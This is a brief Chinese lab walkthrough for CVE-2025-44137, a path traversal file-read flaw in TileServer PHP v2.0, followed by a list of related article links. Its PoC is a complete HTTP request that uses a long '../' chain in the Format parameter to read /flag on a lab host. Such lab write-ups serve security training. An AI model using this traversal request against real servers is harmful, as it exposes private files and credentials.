【春秋云境】CVE-2025-44137 TileServer PHP v2.0任意文件读取漏洞

1、靶场介绍

TileServer PHP是MapTiler开源的一个文件夹托管软件。 TileServer PHP v2.0版本存在安全漏洞,该漏洞源于renderTile函数允许路径遍历,可能导致读取任意文件

2、POC

yaml 复制代码
GET /tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../flag&Request=x&layer=. HTTP/1.1
Host: 39.106.48.123:26282
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

3、总结

没什么总结的,从git上一搜就搜到POC了。

相关推荐
是馄饨呀13 小时前
Apache Tomcat RewriteValve路径遍历漏洞(CVE-2025-55752)修复
java·tomcat·apache
D愿你归来仍是少年15 小时前
Apache Spark Real-Time Mode 深度解析:打破微批次壁垒,挑战 Flink 的实时王座
flink·spark·apache
zhglhy15 小时前
Apache SkyWalking分布式链路实现
分布式·apache·skywalking
我不听你讲话1 天前
LNMP网络服务搭建
linux·php·apache
吴声子夜歌1 天前
小程序——开发接口(授权)
小程序·apache
、花无将2 天前
安装:apache-tomcat
java·tomcat·apache
微学AI2 天前
时序数据库选型:聚焦时间序列数据库Apache IoTDB——为工业物联网与大数据而生
数据库·apache·时序数据库
小邓睡不饱耶3 天前
Apache Flume 1.12.0 深度实战:从架构内核到企业级高可用部署(附完整代码案例)
架构·apache·flume
家有娇妻张兔兔3 天前
Apache Doris 副本故障排查与修复实战指南
apache·doris·时序库
一个天蝎座 白勺 程序猿4 天前
Apache IoTDB(18):IoTDB时序数据库的数据同步之Pipe机制与插件同步指南
数据库·apache·时序数据库·iotdb